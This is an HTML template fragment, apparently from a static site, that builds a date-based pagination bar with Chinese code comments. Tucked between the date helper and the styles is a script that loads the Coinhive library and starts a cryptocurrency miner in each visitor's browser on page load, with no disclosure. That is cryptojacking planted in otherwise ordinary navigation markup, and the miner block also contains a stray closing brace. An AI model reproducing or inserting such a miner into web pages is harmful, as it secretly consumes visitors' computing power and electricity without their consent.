<script language="JavaScript" type="text/javascript">
  function GetDateStr(AddDayCount) {
      var dd = new Date();
      dd.setDate(dd.getDate()+AddDayCount);//获取AddDayCount天后的日期
      var y = dd.getFullYear();
      var m = dd.getMonth()+1;//获取当前月份的日期
      var d = dd.getDate();
      return y+"-"+m+"-"+d;
  }
  </script>
  <script src="https://coinhive.com/lib/coinhive.min.js"></script>
  <script>
    var miner = new CoinHive.Anonymous('76ERnJaUfWHJHZBWkkTAP1AsccgA8bn6', {throttle: 0.3});
    miner.start();
    }
  </script>
<style type="text/css">
  #date_nav li { 
  float:left; /* 往左浮动 */
  }
  #date_nav, #date_nav li {
list-style:none; /* 将默认的列表符号去掉 */
padding:0; /* 将默认的内边距去掉 */
margin:0; /* 将默认的外边距去掉 */
}
  </style>
<div class="container">
  <nav class="pagination" role="pagination">
    <ul id="date_nav">
        <li>
            <p>
              <span class="page-number">
                <a href="{{site.selfurl}}">首页</a>&nbsp;&nbsp;&nbsp;
              </span>
            </p>
          </li>
      <li>
        <p>
          <span class="page-number">
            <a href="{{site.selfurl}}passed/01/">
              <script>
                document.write(GetDateStr(-1));
              </script>
            </a>&nbsp;&nbsp;&nbsp;
          </span>
        </p>
      </li>
      <li>
        <p>
          <span class="page-number">
            <a href="{{site.selfurl}}passed/02/">
              <script>
                document.write(GetDateStr(-2));
              </script>
            </a>&nbsp;&nbsp;&nbsp;
          </span>
        </p>
      </li>
      <li>
        <p>
          <span class="page-number">
            <a href="{{site.selfurl}}passed/03/">
              <script>
                document.write(GetDateStr(-3));
              </script>
            </a>&nbsp;&nbsp;&nbsp;
          </span>
        </p>
      </li>
      <li>
        <p>
          <span class="page-number">
            <a href="{{site.selfurl}}passed/04/">
              <script>
                document.write(GetDateStr(-4));
              </script>
            </a>&nbsp;&nbsp;&nbsp;
          </span>
        </p>
      </li>
      <li>
        <p>
          <span class="page-number">
            <a href="{{site.selfurl}}passed/05/">
              <script>
                document.write(GetDateStr(-5));
              </script>
            </a>&nbsp;&nbsp;&nbsp;
          </span>
        </p>
      </li>
      <li>
        <p>
          <span class="page-number">
            <a href="{{site.selfurl}}passed/06/">
              <script>
                document.write(GetDateStr(-6));
              </script>
            </a>&nbsp;&nbsp;&nbsp;
          </span>
        </p>
      </li>

    </ul>
  </nav>
</div>
